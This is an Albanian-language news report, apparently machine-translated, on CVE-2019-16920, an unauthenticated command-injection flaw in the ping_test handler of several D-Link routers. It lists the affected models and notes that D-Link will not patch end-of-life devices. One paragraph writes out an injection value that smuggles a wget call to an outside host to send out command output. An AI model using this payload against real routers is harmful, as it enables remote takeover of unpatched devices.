Dobësi e shfrytëzuar nga distanca në ruterat D-Link

Në ruterat me valë D-Link identifikuar cenueshmëri e rrezikshme (CVE-2019–16920), i cili ju lejon të ekzekutoni në distancë kodin në anën e pajisjes duke dërguar një kërkesë të veçantë te mbajtësi i "ping_test", i aksesueshëm pa vërtetim.

Interesante, sipas zhvilluesve të firmuerit, thirrja "ping_test" duhet të ekzekutohet vetëm pas vërtetimit, por në realitet thirret në çdo rast, pavarësisht nga hyrja në ndërfaqen e uebit. Në veçanti, kur hyn në skriptin apply_sec.cgi dhe kalon parametrin "action=ping_test", skripti ridrejtohet në faqen e vërtetimit, por në të njëjtën kohë kryen veprimin e lidhur me ping_test. Për të ekzekutuar kodin, një dobësi tjetër u përdor në vetë ping_test, e cila thërret programin ping pa kontrolluar siç duhet korrektësinë e adresës IP të dërguar për testim. Për shembull, për të thirrur programin wget dhe për të transferuar rezultatet e komandës "echo 1234" në një host të jashtëm, thjesht specifikoni parametrin "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( jehonë 1234)".

Dobësi e shfrytëzuar nga distanca në ruterat D-Link

Prania e cenueshmërisë është konfirmuar zyrtarisht në modelet e mëposhtme:

  • DIR-655 me firmware 3.02b05 ose më të vjetër;
  • DIR-866L me firmware 1.03b04 ose më të vjetër;
  • DIR-1565 me firmware 1.01 ose më të vjetër;
  • DIR-652 (nuk ofrohet asnjë informacion në lidhje me versionet problematike të firmuerit)

Periudha e mbështetjes për këto modele tashmë ka skaduar, kështu që D-Link ai deklaroi, e cila nuk do të lëshojë përditësime për ta për të eliminuar cenueshmërinë, nuk rekomandon përdorimin e tyre dhe këshillon zëvendësimin e tyre me pajisje të reja. Si një zgjidhje sigurie, mund të kufizoni aksesin në ndërfaqen e internetit vetëm në adresat IP të besuara.

Më vonë u zbulua se dobësia ishte gjithashtu ndikon modelet DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 dhe DIR-825, plane për lëshimin e përditësimeve për të cilat ende nuk dihen.

Burimi: opennet.ru

Shto një koment